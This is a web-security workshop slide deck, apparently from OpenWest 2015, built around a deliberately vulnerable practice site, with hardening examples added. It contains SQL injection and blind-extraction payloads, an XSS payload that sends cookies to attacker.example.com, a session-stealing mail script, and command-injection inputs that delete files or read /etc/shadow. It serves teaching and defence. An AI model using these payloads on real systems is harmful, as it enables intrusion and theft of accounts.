Hacking Sites for Fun and Profit
OpenWest 2015
David Stockton
or How to Hack Websites and Prevent Your Site from Being Hacked
What this is for
• Learn how common exploits are done and how to identify code that is vulnerable
• Learn how to fix code that is susceptible to these attacks
• Learn how to attack your own code and your own sites so you can fix them
What this is not for
• Hacking or attacking sites that you do not have permission to attack
• If you don’t have permission, don’t do it.
The Code
• The code I am showing you is similar to real code I’ve seen in real projects, but it was written specifically for this presentation.
Gouda Times
• Provided on the VM is a hackable site - The Gouda Times cheese shop and social cheese site
What you need
• Virtualbox 4.3
• The VM
• A browser (preferably Chrome but any works)
• Something to send HTTP requests to the server on the VM
Getting Started
• Copy the contents of the thumb drive
• There are 4 files:
• Virtualbox for Mac and Windows
• The VM
• An image
Import the VM
• Start the VM in VirtualBox and log into the console (vagrant / vagrant)
• ifconfig -a
• Find eth*
• Edit /etc/sysconfig/network-scripts/ifcfg-eth1
• Change DEVICE= to match eth* from above
• sudo service network restart
• mailcatcher --ip=0.0.0.0
One note about email
• On the VM is mailcatcher. It will catch any emails that the system or you cause to be sent. You can access it at http://hacksite.dev:1080/
To play fair
• Don’t go on the VM after the initial set up. However, all the code is there and if you really want to look, feel free:
• /vagrant_web
• Try to figure out some exploits without looking at the code first though
On your host
• Ping 192.168.33.199
• ssh vagrant@192.168.33.199 (password vagrant)
• If this works, add a host entry (/etc/hosts or /windows/system32/drivers/etc/hosts) for hackingsite.dev to 192.168.33.199
Open your browser
Start hacking
• There are loads and loads of vulnerabilities
• If you break the VM, just re-import and start again
• This is your VM on your computer. Anything destructive you do is on you. Be sure you’re in the VM before seeing if rm -rf /* works
A brief introduction to common exploits
• In case this is all completely new
Exploit 1:
• SQL injection
• select * from users where username = '$_POST['username']';
SQL Injection
• $_POST['username'] = "' OR 1=1; --;";
• select * from users where username = '' OR 1=1; --;';
SQL Injection
• $_GET
• $_POST
• $_REQUEST
• what else...
SQL Injection
• $_COOKIE
• values from the database
• Some parts of $_SERVER
Errors can help attackers
• Showing SQL errors can help attackers fix SQL injection attempts
• Other errors can help in other ways (some show passwords)
• Turn off display_errors in production, but log errors always
Blind SQL injection
• Make calls that take varying amounts of time to run. Use the time to determine the answers to questions about the systems you are attacking.
Blind SQL injection
• http://news.org/news.php?id=5
• http://news.org/news.php?id=5 and 1=1
• http://news.org/news.php?id=5 and 1=2
Determine DB version
• news.php?id=5 and substring(@@version,1,1)=5
Subselects?
• news.php?id=5 and (select 1) = 1
Access to other databases/tables
• news.php?id=12 and (select 1 from mysql.user limit 0,1) = 1
Guessing tables
• news.php?id=6 and (select 1 from users limit 0,1) =1
Guessing column names
• news.php?id=11 and (select substring(concat(1, password),1,1) from users limit 0,1)=1
Guessing data
• news.php?id=4 and ascii(substring((SELECT concat(username, 0x3a, password) from users limit 0,1), 1,1))>80
• Increment to guess values letter by letter
Preventing SQL Injection
● mysql_real_escape_string
● Prepared statements
● Input validation and whitelists
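As an added example (not code from the slides or the Gouda Times VM), the login lookup from Exploit 1 rewritten with a PDO prepared statement, the whitelist case that bound parameters cannot cover, and the display_errors/log_errors setting from the errors slide; the DSN, credentials and the users table columns are assumptions.

```php
<?php
// Added example (not from the slides). DSN, credentials and the "users"
// table layout (id, username, email, created_at) are assumptions.

// Never show errors to the client; always log them (slide: "Errors can help attackers").
ini_set('display_errors', '0');
ini_set('log_errors', '1');

function connect(): PDO
{
    return new PDO(
        'mysql:host=127.0.0.1;dbname=gouda;charset=utf8mb4',
        'DB_USER_PLACEHOLDER',
        'DB_PASS_PLACEHOLDER',
        [
            PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES   => false,   // real server-side prepares
            PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
        ]
    );
}

// Vulnerable shape from the slides: the username is spliced into the SQL text,
// so "' OR 1=1; --" rewrites the WHERE clause.
function findUserUnsafe(PDO $pdo, string $username): ?array
{
    $row = $pdo->query("SELECT * FROM users WHERE username = '$username'")->fetch();
    return $row === false ? null : $row;
}

// Hardened shape: the SQL text is fixed at prepare time and the username is
// sent to the server as a bound value, so it is only ever compared, never parsed.
function findUser(PDO $pdo, string $username): ?array
{
    $stmt = $pdo->prepare('SELECT id, username, email FROM users WHERE username = :username');
    $stmt->execute([':username' => $username]);
    $row = $stmt->fetch();
    return $row === false ? null : $row;
}

// Identifiers and keywords cannot be bound, so a user-chosen sort column or
// direction goes through a whitelist: map the request value to a known string.
function listUsersSorted(PDO $pdo, string $sortBy, string $direction): array
{
    $columns    = ['username' => 'username', 'created' => 'created_at'];
    $directions = ['asc' => 'ASC', 'desc' => 'DESC'];
    if (!isset($columns[$sortBy], $directions[$direction])) {
        throw new InvalidArgumentException('Unknown sort parameters');
    }
    $sql = 'SELECT id, username FROM users ORDER BY '
         . $columns[$sortBy] . ' ' . $directions[$direction];
    return $pdo->query($sql)->fetchAll();
}

// Request handler: a database failure is logged in detail but reported generically.
function lookupHandler(string $username): string
{
    try {
        $user = findUser(connect(), $username);
        return $user === null ? 'No such user.' : 'Found ' . $user['username'];
    } catch (PDOException $e) {
        error_log('User lookup failed: ' . $e->getMessage());
        return 'Lookup failed. The problem has been logged.';
    }
}

// The payload from the slides is now just an unusual username that matches nobody.
echo lookupHandler("' OR 1=1; --"), PHP_EOL;
```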
Exploit 2:
• XSS
• Cross-site Scripting
What is it?
• User supplied code running in the browser
So? It’s their browser
• Yep, but it may not be their code.
So? It’s their browser
• It may not be your code, but it might call your code in a way you don’t want
XSS Code
<img src="<?php echo $_POST['image']; ?>">
<.. javascript to open the print dialog ..>
So what?
• What if we post code into $_POST['image']
● Steal session cookies
● Call Javascript APIs to cause actions on the server (CSRF)
● Post forms as the user
The payload:
$_POST['image']
/images/add.gif"><script type="text/javascript">alert('xss!');</script><img src="
Ermahgerd er perperp.
Ooh, that’s soooo malicious, I’m totally shaking right now
• Fine. How about this.
• image = /images/add.gif"><script type="text/javascript">document.write('<img src="http://attacker.example.com/session.php?' + document.cookie + '">'); </script><img src="
WTH did that do?
• Javascript ran FROM the site we’re attacking and it sent your site cookies to a script the attacker controls.
So you stole my cookie. So what?
• Here’s what.
<?php
$session = $_GET['PHPSESSID'];
$body = 'Got session: ' . $session;
mail('attackeremail@attacker.example.org', 'Session Captured', $body);
Oooh, you emailed my cookie... So...
Now it’s my turn...
Why this matters
• Sites identify and authenticate users with the session.
• I have identified myself as you. I am now logged in as you and can do anything you can do on the site.
Ok, so I can steal my own session
• Here’s how to use it against someone.
The first part of the attack
• Create an email to a link on the attacking site that posts the code to the site under attack. Send the email to the victim.
• They click the link, you steal their session.
What else can I do?
• Cross Site Request Forgery (CSRF)
• Causing actions to happen on the user’s behalf
• Purchasing things, changing passwords, creating accounts, etc.
How to prevent?
• Escape output
• Whitelist URLs, domains, input
• Make the print page look up and use image paths from a trusted source (database maybe?)
Prevent CSRF
• Use a CSRF token.
• Disallow requests that don’t contain the correct token.
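As an added example (not from the slides), the print page from the XSS slides and the CSRF prevention slide combined in one hardened handler: image paths come from a trusted table looked up by id, anything reflected into HTML goes through htmlspecialchars(), the session cookie is HttpOnly so document.cookie cannot read it, and state-changing requests must carry a session-bound token. PRINTABLE_IMAGES and the helper names are assumptions.

```php
<?php
// Added example (not from the slides). PRINTABLE_IMAGES, e(), csrfToken(),
// csrfField() and checkCsrf() are names chosen for this example.

// HttpOnly keeps the session cookie out of document.cookie, which is exactly what
// the slides' payload reads; Secure and SameSite narrow where it is sent.
session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
session_start();

// Trusted source for image paths. The slides suggest the database; a static map
// is used here so the example runs without one.
const PRINTABLE_IMAGES = [
    1 => '/images/add.gif',
    2 => '/images/gouda.jpg',
];

// Escape for the HTML context being written into. ENT_QUOTES matters because the
// slides' payload breaks out of a double-quoted attribute.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Resolve an image id to a path; anything not in the table is rejected.
function imagePathForId($id): ?string
{
    if (!ctype_digit((string) $id)) {
        return null;
    }
    return PRINTABLE_IMAGES[(int) $id] ?? null;
}

// Vulnerable version from the slides, for comparison:
//   <img src="<?php echo $_POST['image']; ?>">
// The hardened version never puts user-controlled text in the attribute: the
// request carries only an id, and the path is server-side data that is still escaped.
function renderPrintPage($imageId): string
{
    $path = imagePathForId($imageId);
    if ($path === null) {
        return '<p>Unknown image.</p>';
    }
    return '<img src="' . e($path) . '" alt="">';
}

// CSRF: one random token per session, embedded in every form and checked on
// every state-changing request.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrfField(): string
{
    return '<input type="hidden" name="csrf_token" value="' . e(csrfToken()) . '">';
}

function checkCsrf(array $post): bool
{
    $sent = $post['csrf_token'] ?? '';
    // hash_equals() compares in constant time, so the check is not a timing oracle.
    return is_string($sent)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $sent);
}

// Request handling: reject forged POSTs before doing anything with them.
if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    if (!checkCsrf($_POST)) {
        http_response_code(403);
        error_log('CSRF token mismatch from ' . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
        exit('Invalid request.');
    }
    echo renderPrintPage($_POST['image'] ?? '');
} else {
    echo '<form method="post">' . csrfField()
       . '<select name="image"><option value="1">add.gif</option>'
       . '<option value="2">gouda.jpg</option></select>'
       . '<button>Print</button></form>';
}
```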
Exploit prevention in general
• Filter input
• Escape output
• This works for SQL injection, XSS and more... in general
Exploit 3: Command injection
● shell_exec
● exec
● passthru
● system
● `some command`
PHP Web File Browser
• Supposed to allow viewing of files within the web directories
• $files = shell_exec('ls -al ' . $_GET['dir']);
What’s the danger?
• $_GET['dir'] = '.; rm -rf / *';
• Or whatever.
• cat /etc/passwd; cat /etc/shadow
How to prevent?
• If you must use user input in a command, use escapeshellarg()
• $dir = escapeshellarg($_GET['dir']);
• $files = shell_exec('ls -al ' . $dir);
• Validate that the input is allowed
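As an added example (not from the slides), the PHP web file browser with the escapeshellarg() fix from the slide beside a version that drops the shell entirely and validates that the requested directory stays inside the web root; WEB_ROOT and the function names are assumptions.

```php
<?php
// Added example (not from the slides). WEB_ROOT and the function names are
// assumptions for this example.

const WEB_ROOT = '/var/www/html';

// Still a shell call, but the argument is now one single-quoted word, so the
// slides' ".; rm -rf / *" reaches ls as a (nonexistent) directory name instead of
// being executed. escapeshellarg() says nothing about "../../etc", which is a
// perfectly valid directory name, so validation is still required.
function listWithShell(string $dir): string
{
    $safeDir = escapeshellarg($dir);
    return (string) shell_exec('ls -al ' . $safeDir);
}

// Preferred: no shell at all. Resolve the path, then refuse anything that
// escapes WEB_ROOT (symlinks included, because realpath() follows them).
function allowedDirectory(string $dir): ?string
{
    if (strpos($dir, "\0") !== false) {
        return null;                       // embedded NUL would truncate the path
    }
    $root = realpath(WEB_ROOT);
    $real = $root === false ? false : realpath($root . '/' . $dir);
    if ($root === false || $real === false || !is_dir($real)) {
        return null;
    }
    // The resolved path must be the root itself or live strictly below it.
    if ($real !== $root && strpos($real, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

function listDirectory(string $dir): array
{
    $real = allowedDirectory($dir);
    if ($real === null) {
        // Log the rejected request so probing shows up in the logs.
        error_log('Rejected directory listing request: ' . $dir);
        return [];
    }
    $entries = [];
    foreach (new DirectoryIterator($real) as $f) {
        if ($f->isDot()) {
            continue;
        }
        $entries[] = [
            'name'  => $f->getFilename(),
            'size'  => $f->getSize(),
            'mtime' => date('c', $f->getMTime()),
            'dir'   => $f->isDir(),
        ];
    }
    return $entries;
}

// Both inputs from the slides are rejected before any filesystem access; only a
// directory that really exists under WEB_ROOT is listed.
var_dump(listDirectory('.; rm -rf / *'));
var_dump(listDirectory('../../etc'));
var_dump(listDirectory('images'));
```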
Other types of injection
● Code (eval)
● Regex
● Log
● LDAP
Other exploits
● Authentication / Session management
● Information disclosure
● Sensitive data exposure
● File upload flaws
● Unchecked redirects
● Leftover debug code
● Session fixation
● Internal threats
● Privacy Violation (password in logs, etc)
Mitigation
• Validation on the client
• Reject invalid requests entirely, log intrusion attempt
• Principle of least privilege
• Filter input, escape output
One more exploit
• Session puzzling attack
• http://bit.ly/1eO7jPK
Session Puzzling
• Making requests to privileged and unprivileged pages in a particular order that can escalate privileges of the attacker
How it could work
• Page requiring authentication looks for ‘user’ in session to determine authentication
Session Puzzling
• Login -> forgot password page sends information via ‘user’ in session
Put it together
• Hit pages quickly in this order:
• Login -> forgot password / privileged page
• Privileged page sees ‘user’ and allows attacker in
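As an added example (not from the slides), the session puzzling flow in code: the vulnerable shape where login and the forgot-password page share the ‘user’ session key, beside a fix that keeps reset state under its own key, records authentication explicitly and regenerates the session id on login. The demo account and the function names are constructed for this example.

```php
<?php
// Added example (not from the slides). The account table and function names
// are constructed for this example.

session_start();

// --- vulnerable shape from the slides ---
function forgotPasswordUnsafe(string $username): void
{
    // The reset flow stashes the account under the same key login uses.
    $_SESSION['user'] = $username;
}

function isAuthenticatedUnsafe(): bool
{
    // Presence of 'user' is taken as proof of login, so the reset step alone passes.
    return isset($_SESSION['user']);
}

// --- hardened shape ---

// Constructed demo account; a real app reads the password hash from the database.
$USERS = ['alice' => password_hash('correct horse battery', PASSWORD_DEFAULT)];

function login(array $users, string $username, string $password): bool
{
    if (!isset($users[$username]) || !password_verify($password, $users[$username])) {
        return false;
    }
    // A fresh session id on privilege change defeats fixation, and replacing the
    // whole array discards any state left behind by unauthenticated flows.
    session_regenerate_id(true);
    $_SESSION = ['auth' => ['user' => $username, 'at' => time()]];
    return true;
}

function forgotPassword(string $username): void
{
    // Reset state lives under its own key with an expiry; nothing that decides
    // authentication ever reads it.
    $_SESSION['password_reset'] = ['user' => $username, 'expires' => time() + 900];
}

function isAuthenticated(): bool
{
    return isset($_SESSION['auth']['user']);
}

function requireAuth(): void
{
    if (!isAuthenticated()) {
        error_log('Unauthenticated request to a privileged page');
        http_response_code(403);
        exit('Forbidden');
    }
}

// The puzzling order from the slides: forgot-password, then the privileged page.
forgotPasswordUnsafe('alice');
$puzzledIn = isAuthenticatedUnsafe();   // the reset state alone satisfies the unsafe check

$_SESSION = [];
forgotPassword('alice');
$stillOut = isAuthenticated();          // the hardened check ignores reset state

printf("unsafe check: %s, hardened check: %s\n",
    $puzzledIn ? 'logged in' : 'not logged in',
    $stillOut ? 'logged in' : 'not logged in');
```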
How was this found?
• By accident, via web crawler getting access to privileged pages
Now what?
• Find as many exploits as possible in Gouda Times
• Be creative, you can use multiple exploits in a single creative hack
• Stuck for ideas?
Ideas
• Trick the system to give up another user’s password
• Log in to the system as another user without knowing their password
• Change guestbook entries
• Remove guestbook entries
More ideas
• View nearly any file on the system
• Get your own code onto the system
• Find hidden functionality
• Exploit the site with an image
• Create more users than the system thinks you should have
• Social engineering - get someone to tell you a password
Time to get with the hacking
If you have questions or need help I’ll be around
• If you get a hack to work, let me know and you can share what you did and how
• If you want to try to fix it, the source is on the VM - show me your fix, I’ll try to break it
Want to hack more?
• http://www.badstore.net/
• http://google-gruyere.appspot.com/
• http://www.dvwa.co.uk/
Please rate this tutorial
• https://joind.in/14040

New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 

Recently uploaded (20)

The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 

Hacking sites for fun and profit

  • 1. Hacking Sites for Fun and Profit OpenWest 2015 David Stockton
  • 2. or How to Hack Websites and Prevent Your Site from Being Hacked
  • 3. What this is for • Learn how common exploits are done and how to identify code that is vulnerable • Learn how to fix code that is susceptible to these attacks • Learn how to attack your own code and your own sites so you can fix them
  • 4. What this is not for • Hacking or attacking sites that you do not have permission to attack • If you don’t have permission, don’t do it.
  • 5. The Code • The code I am showing you is similar to real code I’ve seen in real projects, but it was written specifically for this presentation.
  • 6. Gouda Times • Provided on the VM is a hackable site - The Gouda Times cheese shop and social cheese site
  • 7. What you need • Virtualbox 4.3 • The VM • A browser (preferably chrome but any works) • Something to send HTTP requests to the server on the VM
  • 8. Getting Started • Copy the contents of the thumb drive - • There are 4 files: • Virtualbox for Mac and Windows • The VM • An image
  • 9. Import the VM • Start the VM in virtual box and log into the console (vagrant / vagrant) • ifconfig -a • Find eth* • Edit /etc/sysconfig/network-scripts/ifcfg-eth1 • Change DEVICE= to match eth* from above • sudo service network restart • mailcatcher —ip=0.0.0.0
  • 10. One note about email • On the VM is mailcatcher. It will catch any emails that the system or you cause to be sent. You can access it at http://hacksite.dev:1080/
  • 11. To play fair • Don’t go on the VM after the initial set up. However, all the code is there and if you really want to look, feel free: • /vagrant_web • Try to figure out some exploits without looking at the code first though
  • 12. On your host • Ping 192.168.33.199 • ssh vagrant@192.168.33.199 (password vagrant) • If this works, add a host entry (/etc/hosts or /windows/system32/drivers/etc/hosts) for hackingsite.dev to 192.168.33.199
  • 14. Start hacking • There are loads and loads of vulnerabilities • If you break the VM, just re-import and start again • This is your VM on your computer. Anything destructive you do is on you. Be sure you’re in the VM before seeing if rm -rf /* works
  • 15. A brief introduction to common exploits • In case this is all completely new
  • 16. Exploit 1: • SQL injection • select * from users where username = '$_POST['username']';
  • 17. SQL Injection • $_POST['username'] = "' OR 1=1; --;"; • select * from users where username = '' OR 1=1; --;';
  • 18. SQL Injection • $_GET • $_POST • $_REQUEST • what else...
  • 19. SQL Injection • $_COOKIE • values from the database • Some parts of $_SERVER
  • 20. Errors can help attackers • Showing SQL errors can help attackers fix SQL injection attempts • Other errors can help in other ways (some show passwords) • Turn off display_errors in production, but log errors always
  • 21. Blind SQL injection • Make calls that take varying amounts of time to run. Use the time to determine the answers to questions about the systems you are attacking.
  • 22. Blind SQL injection • http://news.org/news.php?id=5 • http://news.org/news.php?id=5 and 1=1 • http://news.org/news.php?id=5 and 1=2
  • 23. Determine DB version • news.php?id=5 and substring(@@version, 1,1)=5
  • 25. Access to other databases/ tables • news.php?id=12 and (select 1 from mysql.user limit 0,1) = 1
  • 26. Guessing tables • news.php?id=6 and (select 1 from users limit 0,1) =1
  • 27. Guessing column names • news.php?id=11 and (select substring(concat(1, password),1,1) from users limit 0,1)=1
  • 28. Guessing data • news.php?id=4 and ascii(substring((SELECT concat(username, 0x3a, password) from users limit 0,1), 1,1))>80 • Increment to guess values letter by letter
  • 29. Preventing SQL Injection ● mysql_real_escape_string ● Prepared statements ● Input validation and whitelists
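The login lookup from slide 16 written the vulnerable way and then with a PDO prepared statement, plus the news.php?id= lookup that the blind-injection slides probe, as an added example that is not the talk's own code. Table and column names, the DSN and the credentials are assumptions.

```php
<?php
// Added example, not the talk's own code. Table/column names and the
// DSN are assumptions; the payloads are the ones shown on the slides.

// VULNERABLE: the raw POST value is spliced into the SQL text, so a
// username of  ' OR 1=1; --;  rewrites the WHERE clause (slide 17).
function findUserVulnerable(PDO $db, $username)
{
    $sql = "SELECT * FROM users WHERE username = '$username'";
    return $db->query($sql)->fetch(PDO::FETCH_ASSOC);
}

// FIXED: the value travels as a bound parameter and is never parsed as
// SQL, so the same payload simply matches no username.
function findUser(PDO $db, $username)
{
    $stmt = $db->prepare('SELECT id, username FROM users WHERE username = :u');
    $stmt->execute(array(':u' => $username));
    return $stmt->fetch(PDO::FETCH_ASSOC);
}

// "news.php?id=5 and 1=2" is the probe from slide 22. Whitelist the id as
// a positive integer first (slide 29: input validation), then bind it typed.
function findNews(PDO $db, $rawId)
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT,
                     array('options' => array('min_range' => 1)));
    if ($id === false) {
        error_log('Rejected news id: ' . $rawId);  // log the attempt, never echo it
        return null;
    }
    $stmt = $db->prepare('SELECT id, title, body FROM news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_ASSOC);
}

// Slide 20: errors go to the log, not to the response the attacker reads.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

$db = new PDO('mysql:host=localhost;dbname=goudatimes;charset=utf8', 'app', 'secret',
    array(PDO::ATTR_ERRMODE         => PDO::ERRMODE_EXCEPTION,
          PDO::ATTR_EMULATE_PREPARES => false));  // real server-side prepares

$user = findUser($db, isset($_POST['username']) ? $_POST['username'] : '');
$news = findNews($db, isset($_GET['id']) ? $_GET['id'] : '');
```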
  • 30. Exploit 2: • XSS • Cross-site Scripting
  • 31. What is it? • User supplied code running in the browser
  • 32. So? It’s their browser • Yep, but it may not be their code.
  • 33. So? It’s their browser • It may not be your code, but it might call your code in a way you don’t want
  • 34. XSS Code <img src="<?php echo $_POST['image'];?>"> <.. javascript to open the print dialog ..>
  • 35. So what? • What if we post code into $_POST['image'] ● Steal session cookies ● Call Javascript APIs to cause actions on the server (CSRF) ● Post forms as the user
  • 38. Ooh, that’s soooo malicious, I’m totally shaking right now • Fine. How about this. • image = /images/add.gif"><script type="text/javascript">document.write('<img src="http://attacker.example.com/session.php?' + document.cookie + '">'); </script><img src="
  • 39. WTH did that do? • Javascript ran FROM the site we’re attacking and it sent your site cookies to a script the attacker controls.
  • 40. So you stole my cookie. So what? • Here’s what. <?php
 $session = $_GET['PHPSESSID'];
 $body = 'Got session: ' . $session;
 mail('attackeremail@attacker.example.org', 'Session Captured', $body);
  • 41. Oooh, you emailed my cookie... So...
  • 42. Now it’s my turn...
  • 43. Why this matters • Sites identify and authenticate users with session. • I have identified myself as you. I am now logged in as you and can do anything you can do on the site.
  • 44. Ok, so I can steal my own session • Here’s how to use it against someone.
  • 45. The first part of the attack • Create an email to a link on the attacking site that posts the code to the site under attack. Send the email to the victim. • They click the link, you steal their session.
  • 46. What else can I do? • Cross Site Request Forgery (CSRF) • Causing actions to happen on the user’s behalf • Purchasing things, changing passwords, creating accounts, etc.
  • 47. How to prevent? • Escape output • Whitelist URLs, domains, input • Make the print page lookup and use image paths from a trusted source (database maybe?)
  • 48. Prevent CSRF • Use a CSRF token. • Disallow requests that don’t contain the correct token.
  • 49. Exploit prevention in general • Filter input • Escape output • This works for SQL injection, XSS and more... • in general
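The print page from slide 34 hardened as slides 47 and 48 describe (trusted image lookup, escaped output, CSRF token), as an added example that is not the talk's own code. The image table, the form fields and the 'csrf' session key are assumptions; hash_equals() needs PHP 5.6 or later.

```php
<?php
// Added example, not the talk's own code. Image list, form fields and
// the 'csrf' session key are assumptions.

// Session cookie unreadable from JavaScript: the document.cookie payload
// from slide 38 gets nothing even if an escape is missed elsewhere.
ini_set('session.cookie_httponly', '1');
session_start();

// Trusted source of image paths (slide 47 suggests the database); a
// constructed in-memory table stands in for it here.
$knownImages = array(
    1 => '/images/cheddar.gif',
    2 => '/images/gouda.gif',
);

// The request supplies only an id; the path itself never comes from the user.
function imagePath(array $known, $rawId)
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT);
    return ($id !== false && isset($known[$id])) ? $known[$id] : '/images/missing.gif';
}

// Escape output: everything that lands in HTML, attribute values included.
function e($value)
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// One random token per session, compared in constant time.
function csrfToken()
{
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(openssl_random_pseudo_bytes(32));
    }
    return $_SESSION['csrf'];
}
function csrfValid($submitted)
{
    return isset($_SESSION['csrf']) && is_string($submitted)
        && hash_equals($_SESSION['csrf'], $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Slide 48: a request without the correct token is refused, and logged.
    if (!csrfValid(isset($_POST['csrf']) ? $_POST['csrf'] : null)) {
        http_response_code(403);
        error_log('CSRF token mismatch from ' . $_SERVER['REMOTE_ADDR']);
        exit;
    }
    $src = imagePath($knownImages, isset($_POST['image']) ? $_POST['image'] : null);
    echo '<img src="' . e($src) . '">';
}
?>
<form method="post">
  <input type="hidden" name="csrf" value="<?php echo e(csrfToken()); ?>">
  <input type="number" name="image" value="1">
  <button type="submit">Print</button>
</form>
```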
  • 50. Exploit 3: Command injection ● shell_exec ● exec ● passthru ● system ● `some command`
  • 51. PHP Web File Browser • Supposed to allow viewing of files within the web directories • $files = shell_exec('ls -al ' . $_GET['dir']);
